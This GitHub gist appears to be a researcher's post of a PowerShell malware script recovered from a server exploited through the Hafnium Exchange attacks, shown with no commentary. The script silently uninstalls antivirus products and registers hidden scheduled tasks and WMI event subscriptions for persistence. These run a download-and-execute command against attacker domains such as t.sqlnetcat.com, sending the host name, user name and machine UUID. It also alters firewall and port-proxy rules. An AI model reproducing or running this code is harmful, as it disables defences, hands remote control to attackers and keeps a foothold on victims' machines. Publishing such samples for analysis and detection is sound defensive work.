Created
March 20, 2021 09:45
-
-
Save technion/92036b15ee59ced2fd92ad85c6e5129e to your computer and use it in GitHub Desktop.
RE on Hafnium exploited server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $v='ipc'; | |
| cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive | |
| cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart | |
| $v="?$v"+(Get-Date -Format '_yyyyMMdd') | |
| $tmps='I`ex ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData(''http://''+''U1''+''U2/a.jsp'+$v+'?''+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join''*''))))' | |
| $sa=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") | |
| function getRan(){return -join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6))} | |
| $us=@('t.netcatkit.com','down.sqlnetcat.com','t.sqlnetcat.com') | |
| $stsrv = New-Object -ComObject Schedule.Service | |
| $stsrv.Connect() | |
| try{ | |
| $doit=$stsrv.GetFolder("\").GetTask("blackball") | |
| }catch{} | |
| if(-not $doit){ | |
| if($sa){ | |
| schtasks /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr "blackball" | |
| } else { | |
| schtasks /create /sc MINUTE /mo 120 /tn blackball /F /tr "blackball" | |
| } | |
| foreach($u in $us){ | |
| $i = [array]::IndexOf($us,$u) | |
| if($i%3 -eq 0){$tnf=''} | |
| if($i%3 -eq 1){$tnf=getRan} | |
| if($i%3 -eq 2){if($sa){$tnf='MicroSoft\Windows\'+(getRan)}else{$tnf=getRan}} | |
| $tn = getRan | |
| if($sa){ | |
| schtasks /create /ru system /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD" | |
| powershell -w hidden -c PS_CMD | |
| } else { | |
| schtasks /create /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD" | |
| powershell -w hidden -c PS_CMD | |
| } | |
| start-sleep 1 | |
| $folder=$stsrv.GetFolder("\$tnf") | |
| $taskitem=$folder.GetTasks(1) | |
| foreach($task in $taskitem){ | |
| foreach ($action in $task.Definition.Actions) { | |
| try{ | |
| if($action.Arguments.Contains("PS_CMD")){ | |
| $folder.RegisterTask($task.Name, $task.Xml.replace("PS_CMD",$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5))), 4, $null, $null, 0, $null)|out-null | |
| } | |
| }catch{} | |
| } | |
| } | |
| start-sleep 1 | |
| schtasks /run /tn "$tnf\$tn" | |
| start-sleep 5 | |
| } | |
| } | |
| try{ | |
| $doit1=Get-WMIObject -Class __EventFilter -NameSpace 'root\subscription' -filter "Name='blackball'" | |
| }catch{} | |
| if(-not $doit1){ | |
| Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="blackball";EventNameSpace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";} -ErrorAction Stop | |
| foreach($u in $us){ | |
| $theName=getRan | |
| $wmicmd=$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5)).replace('a.jsp','aa.jsp') | |
| Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=(Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="f"+$theName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";} -ErrorAction Stop);Consumer=(Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name="c"+$theName;ExecutablePath="c:\windows\system32\cmd.exe";CommandLineTemplate="/c powershell -w hidden -c $wmicmd"})} | |
| start-sleep 5 | |
| } | |
| Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 ???Force | |
| } | |
| cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd | |
| netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 | |
| netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block | |
| netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block | |
| schtasks /delete /tn Rtsa2 /F | |
| schtasks /delete /tn Rtsa1 /F | |
| schtasks /delete /tn Rtsa /F |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment